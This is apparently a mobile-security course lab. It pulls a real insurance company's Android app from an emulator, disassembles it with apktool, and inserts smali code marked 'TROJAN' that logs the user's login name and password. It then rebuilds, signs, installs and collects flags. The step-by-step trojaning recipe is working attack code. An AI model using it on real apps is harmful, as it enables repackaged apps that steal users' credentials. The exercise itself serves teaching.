If you are up to a challenge, try using the new version of the app from the app store as shown below, but it may be difficult.
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the
"List of devices attached",
as shown below.
sudo apt update
sudo apt install android-tools-adb -y
wget --no-check-certificate https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
wget --no-check-certificate https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.5.0.jar
mv apktool_2.5.0.jar apktool.jar
sudo mv apktool.jar /usr/bin
sudo mv apktool /usr/bin
sudo chmod +x /usr/bin/apktool*
sudo apt install default-jdk
adb shell pm list packages | grep prog
The reply shows the package name,
as shown below. Use that package
name in the next command to
get the APK path:
adb shell pm path com.phonevalley.progressive
The reply shiows the full path to the
APK. Use that path
in the next command to
pull the APK file:
adb pull /data/app/com.phonevalley.progressive-yHPkfG7TWMsbngAN-RW68g==/base.apk
The file downloads into Debian,
as shown below.
apktool d -f -r base.apk
Apktool
disassembles the app,
as shown below.
It might seem difficult to hunt through all those files and folders for important items, but it's easy to do because the code is not obfuscated, and contains easily-guessed object names.
Execute this command:
grep -ir login . | grep password
This finds
lines containing both "login"
and "password",
as shown below.
The lines are wide and wrap in a way that makes them difficult to read, so use "less" to clean them up:
grep -ir login . | grep password | less -S
Now it's easy to see that only
a few files have interesting content.
We'll edit the
file highlighted in the image below.
Press Q to exit "less".
nano ./base/smali_classes2/com/phonevalley/progressive/login/viewmodel/LoginViewModel.smali
The Smali file opens in nano.
Type Ctrl+W to start a
search. Type in this search string,
as shown below.
loginOnlineAccount(
Press Enter. Type Ctrl+W again. Press Enter again.
You see the start of the ".method private loginOnlineAccount(" function, as shown below.
Notice the line highlighted in the image above that says:
.locals 5
That line reserves five local variables
for use in this method. We need another
variable to use, so change that line to:
.locals 6
as shown below.
Scroll down a little, and look at the code below the ".line 434" mark, as shown below.
On Jan 29, 2020 I repeated this project and the steps still work, but the line number is now 573.
This code puts the username into variable v2 and the password into variable v3. All we need to do is to put those variables into the log.
Carefully insert this code after the second "check-cast" statement, as shown below.
# TROJAN
const-string v5, "TROJAN Stealing Progressive Credentials:"
invoke-static {v5, v2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-static {v5, v3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
# END OF TROJAN
Press Ctrl+X, Y, Enter to save the modified file.
apktool b base
Apktool builds the app,
as shown below.
Execute this command:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
A prompt asks for a "keystore password". Enter
password twice.
Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore base/dist/base.apk alias_name
When you are prompted to, enter the
key store password of password
The app is signed, as shown below.
adb install base/dist/base.apk
The installation succeeds, as shown below.
adb logcat
A lot of messages scroll by.
To make the display cleaner, press Ctrl+C and execute this command:
adb logcat | grep TROJAN
Now the scrolling stops,
waiting for log entries containing
the string "TROJAN",
as shown below.
Enter fake credentials, using your name as the login name, as shown below. Click "Log in".
M 401.1: Log Entry (20 pts)
Find the text covered by a green box in the image above. That's the flag.Capturing a Screen Image
Capture a WHOLE-DESKTOP image showing the flag.Save the image as "Proj M 401.1 from YOUR NAME".
If you prefer, you can use my archived copy here:
Add a Trojan to steal the username and password, as shown below.
M 401.2: Smali Code (20 pts)
Examine the function you Trojaned in a text editor.Find the text covered by a green box in the image below. That's the flag.
Capturing a Screen Image
Capture a WHOLE-DESKTOP image showing the flag.Save the image as "Proj M 401.2 from YOUR NAME".